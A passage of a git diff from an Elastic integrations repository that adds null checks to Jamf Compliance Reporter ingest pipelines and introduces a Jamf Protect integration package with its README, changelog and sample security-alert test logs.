'aue_ssauthint' - pipeline: name: '{{ IngestPipeline "pipeline_aue_tasknameforpid" }}' - if: ctx.event?.action == 'aue_tasknameforpid' + if: ctx.event.action == 'aue_tasknameforpid' - pipeline: name: '{{ IngestPipeline "pipeline_aue_unmount" }}' - if: ctx.event?.action == 'aue_unmount' + if: ctx.event.action == 'aue_unmount' - pipeline: name: '{{ IngestPipeline "pipeline_aue_fork" }}' - if: ctx.event?.action == 'aue_fork' + if: ctx.event.action == 'aue_fork' - pipeline: name: '{{ IngestPipeline "pipeline_identity_object" }}' - if: '["aue_getauid", "aue_lw_login", "aue_settimeofday"].contains(ctx.event?.action)' + if: '["aue_getauid", "aue_lw_login", "aue_settimeofday"].contains(ctx.event.action)' - pipeline: name: '{{ IngestPipeline "pipeline_aue_listen" }}' - if: ctx.event?.action == 'aue_listen' + if: ctx.event.action == 'aue_listen' - pipeline: name: '{{ IngestPipeline "pipeline_aue_logout" }}' - if: ctx.event?.action == 'aue_logout' + if: ctx.event.action == 'aue_logout' - pipeline: name: '{{ IngestPipeline "pipeline_aue_pidfortask" }}' - if: ctx.event?.action == 'aue_pidfortask' + if: ctx.event.action == 'aue_pidfortask' - pipeline: name: '{{ IngestPipeline "pipeline_aue_ptrace" }}' - if: ctx.event?.action == 'aue_ptrace' + if: ctx.event.action == 'aue_ptrace' - pipeline: name: '{{ IngestPipeline "pipeline_aue_setpriority" }}' - if: ctx.event?.action == 'aue_setpriority' + if: ctx.event.action == 'aue_setpriority' - pipeline: name: '{{ IngestPipeline "pipeline_aue_socketpair" }}' - if: ctx.event?.action == 'aue_socketpair' + if: ctx.event.action == 'aue_socketpair' - pipeline: name: '{{ IngestPipeline "pipeline_aue_taskforpid" }}' - if: ctx.event?.action == 'aue_taskforpid' + if: ctx.event.action == 'aue_taskforpid' - pipeline: name: '{{ IngestPipeline "pipeline_aue_wait4" }}' - if: ctx.event?.action == 'aue_wait4' + if: ctx.event.action == 'aue_wait4' on_failure: - set: field: event.kind diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml index dc3230f0995..331a9c99661 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml @@ -65,8 +65,9 @@ processors: - script: description: Convert Decimal into Octal. lang: painless + if: ctx.json?.file_access_mode != null source: | - int temp = (int)ctx.json?.file_access_mode; + int temp = (int)ctx.json.file_access_mode; ctx.jamf_compliance_reporter.log.attributes.file.access_mode = Integer.toOctalString(temp); on_failure: - set: diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml index fe3f1f5affa..baab69174ee 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml @@ -67,8 +67,9 @@ processors: - script: description: Convert Decimal into Octal. lang: painless + if: ctx.json?.file_access_mode != null source: | - int temp = (int)ctx.json?.file_access_mode; + int temp = (int)ctx.json.file_access_mode; ctx.jamf_compliance_reporter.log.attributes.file.access_mode = Integer.toOctalString(temp); on_failure: - set: diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml index 0bfcf44c5a6..997c3bf5bd7 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml @@ -134,14 +134,17 @@ processors: source: | def args_list = new ArrayList(); ctx.process.args = args_list; - for (Map.Entry m : ctx.json?.args.entrySet()) { - ctx.process?.args.add(m.getValue()); + if (ctx.json?.args != null) { + for (Map.Entry m : ctx.json.args.entrySet()) { + ctx.process.args.add(m.getValue()); + } } - script: description: Convert Decimal into Octal. lang: painless + if: ctx.json?.file_access_mode != null source: | - int temp = (int)ctx.json?.file_access_mode; + int temp = (int)ctx.json.file_access_mode; ctx.jamf_compliance_reporter.log.attributes.file.access_mode = Integer.toOctalString(temp); on_failure: - set: diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml index c1cf9fe39fb..15817ff08dd 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml @@ -77,6 +77,7 @@ processors: - script: description: Convert Decimal into Octal. lang: painless + if: ctx.json?.file_access_mode != null source: | int temp = (int)ctx.json?.file_access_mode; ctx.jamf_compliance_reporter.log.attributes.file.access_mode = Integer.toOctalString(temp); diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml index 939d6e340bd..0817db223fa 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml @@ -40,8 +40,10 @@ processors: source: | def args_list = new ArrayList(); ctx.process.args = args_list; - for (Map.Entry m : ctx.json?.args.entrySet()) { - ctx.process?.args.add(m.getValue()); + if (ctx.json?.args != null) { + for (Map.Entry m : ctx.json.args.entrySet()) { + ctx.process.args.add(m.getValue()); + } } - pipeline: name: '{{ IngestPipeline "pipeline_identity_object" }}' diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml index f42173c6686..4d55ece2e1d 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml @@ -67,8 +67,9 @@ processors: - script: description: Convert Decimal into Octal. lang: painless + if: ctx.json?.file_access_mode != null source: | - int temp = (int)ctx.json?.file_access_mode; + int temp = (int)ctx.json.file_access_mode; ctx.jamf_compliance_reporter.log.attributes.file.access_mode = Integer.toOctalString(temp); on_failure: - set: diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_event.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_event.yml index 04c5b1e82be..4b67f3ca4f6 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_event.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_event.yml @@ -78,51 +78,52 @@ processors: field: json.host_info.serial_number target_field: host.id ignore_missing: true + # NOTE: ctx.event is initialized by an earlier processor - pipeline: name: '{{ IngestPipeline "pipeline_audio_video_device_event" }}' - if: ctx.event?.action == 'audio_video_device_event' + if: ctx.event.action == 'audio_video_device_event' - pipeline: name: '{{ IngestPipeline "pipeline_audit_class_verification_event" }}' - if: ctx.event?.action == 'audit_class_verification_event' + if: ctx.event.action == 'audit_class_verification_event' - pipeline: name: '{{ IngestPipeline "pipeline_compliance_reporter_tamper_event_and_file_event_info" }}' - if: '["compliance_reporter_tamper_event", "file_event"].contains(ctx.event?.action)' + if: '["compliance_reporter_tamper_event", "file_event"].contains(ctx.event.action)' - pipeline: name: '{{ IngestPipeline "pipeline_gatekeeper_info_event" }}' - if: ctx.event?.action == 'gatekeeper_info_event' + if: ctx.event.action == 'gatekeeper_info_event' - pipeline: name: '{{ IngestPipeline "pipeline_gatekeeper_manual_overrides" }}' - if: ctx.event?.action == 'gatekeeper_manual_overrides' + if: ctx.event.action == 'gatekeeper_manual_overrides' - pipeline: name: '{{ IngestPipeline "pipeline_gatekeeper_quarantine_log" }}' - if: ctx.event?.action == 'gatekeeper_quarantine_log' + if: ctx.event.action == 'gatekeeper_quarantine_log' - pipeline: name: '{{ IngestPipeline "pipeline_hardware_event" }}' - if: ctx.event?.action == 'hardware_event' + if: ctx.event.action == 'hardware_event' - pipeline: name: '{{ IngestPipeline "pipeline_license_info_event" }}' - if: ctx.event?.action == 'license_info_event' + if: ctx.event.action == 'license_info_event' - pipeline: name: '{{ IngestPipeline "pipeline_preference_list_event" }}' - if: ctx.event?.action == 'preference_list_event' + if: ctx.event.action == 'preference_list_event' - pipeline: name: '{{ IngestPipeline "pipeline_print_event_information" }}' - if: ctx.event?.action == 'print_event_information' + if: ctx.event.action == 'print_event_information' - pipeline: name: '{{ IngestPipeline "pipeline_prohibited_app_blocked" }}' - if: ctx.event?.action == 'prohibited_app_blocked' + if: ctx.event.action == 'prohibited_app_blocked' - pipeline: name: '{{ IngestPipeline "pipeline_signal_event" }}' - if: ctx.event?.action == 'signal_event' + if: ctx.event.action == 'signal_event' - pipeline: name: '{{ IngestPipeline "pipeline_unified_log_event" }}' - if: ctx.event?.action == 'unified_log_event' + if: ctx.event.action == 'unified_log_event' - pipeline: name: '{{ IngestPipeline "pipeline_xprotect_definitions_version_info" }}' - if: ctx.event?.action == 'xprotect_definitions_version_info' + if: ctx.event.action == 'xprotect_definitions_version_info' - pipeline: name: '{{ IngestPipeline "pipeline_xprotect_event_log" }}' - if: ctx.event?.action == 'xprotect_event_log' + if: ctx.event.action == 'xprotect_event_log' on_failure: - set: field: event.kind diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_license_info_event.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_license_info_event.yml index befa9e52075..cfca45d4f75 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_license_info_event.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_license_info_event.yml @@ -14,7 +14,7 @@ processors: - date: field: json.ComplianceReporter_license_info.expiration_date target_field: jamf_compliance_reporter.log.compliancereporter_license_info.expiration_date - if: ctx.json?.compliancereporter_license_info?.expiration_date != 0 + if: ctx.json?.ComplianceReporter_license_info?.expiration_date != null && ctx.json.ComplianceReporter_license_info.expiration_date != 0 formats: - dd/MM/yyyy on_failure: @@ -28,7 +28,7 @@ processors: - date: field: json.ComplianceReporter_license_info.time_seconds_epoch target_field: jamf_compliance_reporter.log.compliancereporter_license_info.time - if: ctx.json?.compliancereporter_license_info?.time_seconds_epoch != '0' + if: ctx.json?.ComplianceReporter_license_info?.time_seconds_epoch != null && ctx.json.ComplianceReporter_license_info.time_seconds_epoch != '0' formats: - UNIX on_failure: diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_print_event_information.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_print_event_information.yml index 53089b79003..f61a2a417b5 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_print_event_information.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_print_event_information.yml @@ -4,7 +4,7 @@ processors: - date: field: json.event_attributes.job_completed_time target_field: jamf_compliance_reporter.log.event_attributes.job.completed_time - if: ctx.json?.event_attributes?.job_completed_time != 0 + if: ctx.json?.event_attributes?.job_completed_time != null && ctx.json.event_attributes.job_completed_time != 0 formats: - UNIX on_failure: @@ -14,7 +14,7 @@ processors: - date: field: json.event_attributes.job_creation_time target_field: jamf_compliance_reporter.log.event_attributes.job.creation_time - if: ctx.json?.event_attributes?.job_creation_time != 0 + if: ctx.json?.event_attributes?.job_creation_time != null && ctx.json.event_attributes.job_creation_time != 0 formats: - UNIX on_failure: @@ -38,7 +38,7 @@ processors: - date: field: json.event_attributes.job_processing_time target_field: jamf_compliance_reporter.log.event_attributes.job.processing_time - if: ctx.json?.event_attributes?.job_processing_time != 0 + if: ctx.json?.event_attributes?.job_processing_time != null && ctx.json.event_attributes.job_processing_time != 0 formats: - UNIX on_failure: diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_prohibited_app_blocked.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_prohibited_app_blocked.yml index 65cd966e05c..1da8afa7087 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_prohibited_app_blocked.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_prohibited_app_blocked.yml @@ -263,8 +263,10 @@ processors: source: | def args_list = new ArrayList(); ctx.process.args = args_list; - for (Map.Entry m : ctx.json?.args.entrySet()) { - ctx.process?.args.add(m.getValue()); + if (ctx.json?.args != null) { + for (Map.Entry m : ctx.json.args.entrySet()) { + ctx.process.args.add(m.getValue()); + } } on_failure: - set: diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_unified_log_event.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_unified_log_event.yml index 3d09d08e13e..6ed92eca548 100644 --- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_unified_log_event.yml +++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_unified_log_event.yml @@ -126,7 +126,7 @@ processors: - date: field: json.event_attributes.timestamp target_field: jamf_compliance_reporter.log.event_attributes.timestamp - if: ctx.json?.event_attributes?.timestamp != 0 + if: ctx.json?.event_attributes?.timestamp != null && ctx.json.event_attributes.timestamp != 0 formats: - yyyy-MM-dd HH:mm:ss.SSSSSSZ on_failure: diff --git a/packages/jamf_compliance_reporter/manifest.yml b/packages/jamf_compliance_reporter/manifest.yml index 12845a0e929..88305aaa722 100644 --- a/packages/jamf_compliance_reporter/manifest.yml +++ b/packages/jamf_compliance_reporter/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: jamf_compliance_reporter title: Jamf Compliance Reporter -version: "1.11.1" +version: "1.12.0" description: Collect logs from Jamf Compliance Reporter with Elastic Agent. type: integration categories: diff --git a/packages/jamf_protect/_dev/build/build.yml b/packages/jamf_protect/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/jamf_protect/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/jamf_protect/_dev/build/docs/README.md b/packages/jamf_protect/_dev/build/docs/README.md new file mode 100644 index 00000000000..f2ac960cc62 --- /dev/null +++ b/packages/jamf_protect/_dev/build/docs/README.md @@ -0,0 +1,112 @@ +# Jamf Protect + +The Jamf Protect integration collects and parses data received from [Jamf Protect](https://learn.jamf.com/bundle/jamf-protect-documentation/page/About_Jamf_Protect.html) using a HTTP endpoint. + +Use the Jamf Protect integration to collect logs from your machines. +Then visualize that data in Kibana, create alerts to notify you if something goes wrong, and reference data when troubleshooting an issue. + +## Data streams + +The Jamf Protect integration collects 4 types of events: alerts, telemetry, web threat events, and web traffic events. + +[**Alerts**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Alerts.html) help you keep a record of Alerts and Unified Logs happening on endpoints using Jamf Protect. + +[**Telemetry**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Creating_an_Action_Configuration.html) help you keep a record of audit events happening on endpoints using Jamf Protect. + +[**Web threat events**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Data_Streams_Overview.html) help you keep a record of web threat events happening on endpoints using Jamf Protect. + +[**Web traffic events**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Data_Streams_Overview.html) help you keep a record of content filtering and network requests happening on endpoints using Jamf Protect. + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + +## Setup + +To use this integration, you will also need to: +- Enable the integration in Elastic +- Configure Jamf Protect (macOS Security) to send logs to the Elastic Agent (Custom HTTP Endpoint Logs) + - Remote Alert Collection Endpoints + - Unified Logs Collection Endpoints + - Telemetry Collection Endpoints +- Configure Jamf Protect (Jamf Security Cloud) to send logs to the Elastic Agent (Custom HTTP Endpoint Logs) + - Threat Event Stream + - Network Traffic Stream + + +### Enable the integration in Elastic + +For step-by-step instructions on how to set up an new integration in Elastic, see the +[Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. +When setting up the integration, you will choose to collect logs via HTTP Endpoint. + +### Configure Jamf Protect + +After validating settings, you can configure Jamf Protect to send events to Elastic. +For more information on configuring Jamf Protect, see +- [Creating an Action Configuration](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Creating_an_Action_Configuration.html) +- [Configure Threat Event Stream](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Configuring_the_Network_Threat_Events_Stream_to_send_HTTP_Events.html) +- [Configure Network Traffic Stream](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Configuring_the_Network_Threat_Events_Stream_to_send_HTTP_Events.html) + +Then, depending on which events you want to send to Elastic, configure one or multiple HTTP endpoints: + +**Remote Alert Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Unified Logs Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Telemetry Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Threats Event Stream**: +- In the Server hostname or IP field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Network Traffic Stream**: +- In the Server hostname or IP field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + + +**Copyright (c) 2024, Jamf Software, LLC. All rights reserved.** + +## Logs reference + +#### alerts + +This is the `Alerts` dataset. + +##### Example + +{{event "alerts"}} + +{{fields "alerts"}} + +#### telemetry + +This is the `Telemetry` dataset. + +##### Example + +{{event "telemetry"}} + +{{fields "telemetry"}} + +#### threats event stream + +This is the `Threats Event Stream` dataset. + +##### Example + +{{event "web_threat_events"}} + +{{fields "web_threat_events"}} + +#### network traffic stream + +This is the `Network Traffic Stream` dataset. + +##### Example + +{{event "web_traffic_events"}} + +{{fields "web_traffic_events"}} \ No newline at end of file diff --git a/packages/jamf_protect/changelog.yml b/packages/jamf_protect/changelog.yml new file mode 100644 index 00000000000..eb18a7af5fd --- /dev/null +++ b/packages/jamf_protect/changelog.yml @@ -0,0 +1,16 @@ +# newer versions go on top +- version: "0.3.0" + changes: + - description: Fixing json renaming. + type: enhancement + link: https://github.com/elastic/integrations/pull/9581 +- version: "0.2.0" + changes: + - description: Adding parent.process_entity_id. + type: enhancement + link: https://github.com/elastic/integrations/pull/9577 +- version: "0.1.0" + changes: + - description: Initial release of Jamf Protect integration for Elastic. + type: enhancement + link: https://github.com/elastic/integrations/pull/9135 diff --git a/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log b/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log new file mode 100644 index 00000000000..a73e5285508 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log @@ -0,0 +1,11 @@ +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.2 (Build 23C5030f)","ips":["175.16.199.1"],"serial":"C02ZW0GTLVDL","hostname":"LMAC-ZW0GTLVDL","protectVersion":"5.1.1.2","provisioningUDID":"32EC79C5-26DC-535A-85F7-986F063297E2"},"match":{"tags":["Visibility"],"uuid":"6bdb0697-6d07-47bc-a37d-6c3348a5d953","event":{"dev":16777225,"gid":0,"pid":15910,"uid":0,"path":"/Applications/.Microsoft Teams (work or school).app.installBackup","type":3,"uuid":"391104e6-ca86-4afb-82c0-7453595624a6","iNode":19478271,"eventID":154840,"prevFile":"/Applications/Microsoft Teams (work or school).app","timestamp":1700566364.184953},"facts":[{"name":"CustomURLHandlerCreation","tags":["Visibility"],"uuid":"25a295ca-f4b3-4f78-8faa-80e9182645f1","human":"Application that uses custom url handler created","actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"Signer","value":"4","valueType":"String"},{"name":"BundleURLTypes","value":"{\n CFBundleTypeRole = Editor;\n CFBundleURLName = \"com.microsoft.teams2\";\n CFBundleURLSchemes = (\n msteams\n );\n}","valueType":"String"}],"version":1,"severity":0}],"custom":false,"actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"Signer","value":"4","valueType":"String"},{"name":"BundleURLTypes","value":"{\n CFBundleTypeRole = Editor;\n CFBundleURLName = \"com.microsoft.teams2\";\n CFBundleURLSchemes = (\n msteams\n );\n}","valueType":"String"}],"severity":0},"related":{"files":[{"gid":0,"uid":0,"fsid":16777225,"mode":16804,"path":"/Applications/.Microsoft Teams (work or school).app.installBackup","size":96,"inode":19478271,"xattrs":["com.apple.macl"],"changed":1700566364,"created":0,"sha1hex":"","accessed":1698762823,"modified":1698762823,"sha256hex":"","isDownload":false,"objectType":"GPSystemObject","isAppBundle":true,"isDirectory":true,"signingInfo":{"appid":"","status":-67062,"teamid":"","signerType":4,"authorities":[],"entitlements":[],"statusMessage":"code object is not signed at all","informationStage":"extended"},"isScreenShot":false}],"users":[{"uid":0,"name":"root","uuid":"C02ZW0GTLVDL0"}],"groups":[{"gid":0,"name":"wheel","uuid":"C02ZW0GTLVDL0"}],"binaries":[{"gid":0,"uid":0,"fsid":16777225,"mode":33261,"path":"/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper","size":293200,"inode":19877984,"xattrs":[],"changed":1700045896,"created":1700045896,"sha1hex":"5ddcd49004e66cead79ca82991f1b4d4a8ba52d9","accessed":1700045896,"modified":1700045896,"sha256hex":"8fd91d9d1ca53ef93921c8072e12ec082c9eba62bf93f0f900e71b6aa4fa0ed8","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.microsoft.autoupdate.helper","cdhash":"Ji34X0RVyhgstFZxr7Jsmtnf8Ts=","status":0,"teamid":"UBF8T346G9","signerType":2,"authorities":["Developer ID Application: Microsoft Corporation (UBF8T346G9)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false}],"processes":[{"gid":0,"pid":15910,"uid":0,"args":["/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper","XPC_SERVICE_NAME=com.microsoft.autoupdate.helper","PATH=/usr/bin:/bin:/usr/sbin:/sbin","XPC_FLAGS=1","pfz=0x7ffffff12000","stack_guard=0x94bec1a9eb9800ea","malloc_entropy=0x7777a3bc060946c0,0x6f95455435250cbc","ptr_munge=0x749c1515ccadfca","main_stack=0x7ff7bf6da000,0x800000,0x7ff7bb6da000,0x4000000","executable_file=0x1a01000009,0x12f5060","dyld_file=0x1a01000009,0xfffffff000982f7","executable_cdhash=262df85f4455ca182cb45671afb26c9ad9dff13b","executable_boothash=1fc9ca7065a4d7a9c299cc51414c052e5d7025d7","th_port=0x103"],"name":"com.microsoft.autoupdate.helper","path":"/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper","pgid":15910,"ppid":1,"rgid":0,"ruid":0,"uuid":"b8cd6fa5-e8c3-4f05-88a0-68469d04806c","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.microsoft.autoupdate.helper","cdhash":"Ji34X0RVyhgstFZxr7Jsmtnf8Ts=","status":0,"teamid":"UBF8T346G9","signerType":2,"authorities":["Developer ID Application: Microsoft Corporation (UBF8T346G9)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":15910,"startTimestamp":1700566364,"originalParentPID":1,"processIdentifier":266122}]},"eventType":"GPFSEvent"}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.0 (Build 23A344)","ips":["175.16.199.2"],"serial":"Z2C23RW4DY","hostname":"VMAC-2C23RW4DY","protectVersion":"5.1.0.4","provisioningUDID":"0000FE00-8406CE28ECFC4DAB"},"match":{"tags":["MITREattack","DefenseEvasion","T1548.004","AbuseElevationControlMechanism","PrivilegeEscalation"],"uuid":"7232d4a4-2289-49ba-a218-215ef3d62ec4","event":{"pid":3136,"type":1,"uuid":"e19385fc-6077-4d00-ad56-b89eec15e730","subType":7,"timestamp":1698841238.851668},"facts":[{"name":"User Elevated Action","tags":["DefenseEvasion","T1548.004","PrivilegeEscalation","MITREattack","AbuseElevationControlMechanism"],"uuid":"db094865-99c2-416c-9f06-e7740d9e8a20","human":"Application used deprecated elevation API","actions":[{"name":"Report"}],"context":[],"version":1,"severity":0}],"custom":false,"actions":[{"name":"Report"}],"context":[],"severity":0},"related":{"files":[],"users":[{"uid":0,"name":"root","uuid":"Z2C23RW4DY0"},{"uid":501,"name":"local-admin","uuid":"Z2C23RW4DY1f5"}],"groups":[{"gid":0,"name":"wheel","uuid":"Z2C23RW4DY0"},{"gid":20,"name":"staff","uuid":"Z2C23RW4DY14"}],"binaries":[{"gid":0,"uid":0,"fsid":16777230,"mode":35273,"path":"/usr/libexec/security_authtrampoline","size":134768,"inode":1152921500312504800,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"82e899cb1c8a42b74653b05ca526d5feae92b9f6","accessed":1694870910,"modified":1694870910,"sha256hex":"7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.security_authtrampoline","cdhash":"rbIoddPMz9MoMMZl1ATihY8wlMk=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":33261,"path":"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher","size":6929392,"inode":4631313,"xattrs":[],"changed":1698101729,"created":1697718684,"sha1hex":"4f16310b5f518c8b0bd29afdfb8e2ca7a5a0b0b3","accessed":1698818094,"modified":1697718684,"sha256hex":"b6e3e8d03cb0b11bf0e30649fcb3755e58babd00f942e07f85b656980fe4d9ff","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.jamf.remoteassist.launcher","cdhash":"OkjDuX0cFaDreH32s6FfHKg1FqE=","status":0,"teamid":"483DWKW443","signerType":2,"authorities":["Developer ID Application: JAMF Software (483DWKW443)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":35145,"path":"/usr/bin/sudo","size":1446192,"inode":1152921500312502700,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"8e860430a91946640dcc5161c726a39dc8576cc3","accessed":1694870910,"modified":1694870910,"sha256hex":"38e7f57d53e3c8847ea3361085e13d87849b31f588bfe9e9e1c02abfac542aef","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.sudo","cdhash":"LZl8hBA1BePrgPrqw+Ap/HR6YUg=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":33133,"path":"/bin/bash","size":1310224,"inode":1152921500312501200,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"db9d08f69e6bff5c31ff7d7a0da06a0a8311c393","accessed":1694870910,"modified":1694870910,"sha256hex":"4c70b5307a375045d205dbff19dc96fdaa25a77061446259204657c97726c70a","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.bash","cdhash":"w8D5iqHkJJxjGQGuFQLtfzG2Wes=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No 